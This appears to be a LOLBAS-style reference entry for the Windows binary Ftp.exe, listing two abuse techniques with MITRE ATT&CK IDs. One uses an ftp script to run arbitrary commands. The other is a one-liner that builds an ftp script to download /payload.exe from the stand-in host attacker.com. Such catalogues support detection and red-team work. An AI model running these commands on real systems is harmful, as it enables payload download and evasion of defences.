.. /Ftp.exe
Star

A binary designed for connecting to FTP servers


Paths:

Resources:
Acknowledgements:

Detection:

Execute

Executes the commands you put inside the text file.
echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt
Usecase: Spawn new process using ftp.exe. Ftp.exe runs cmd /C YourCommand
Privileges required: User
OS: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
MITRE ATT&CK®: T1202



Download

Download
cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
Usecase: Spawn new process using ftp.exe. Ftp.exe downloads the binary.
Privileges required: User
OS: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
MITRE ATT&CK®: T1105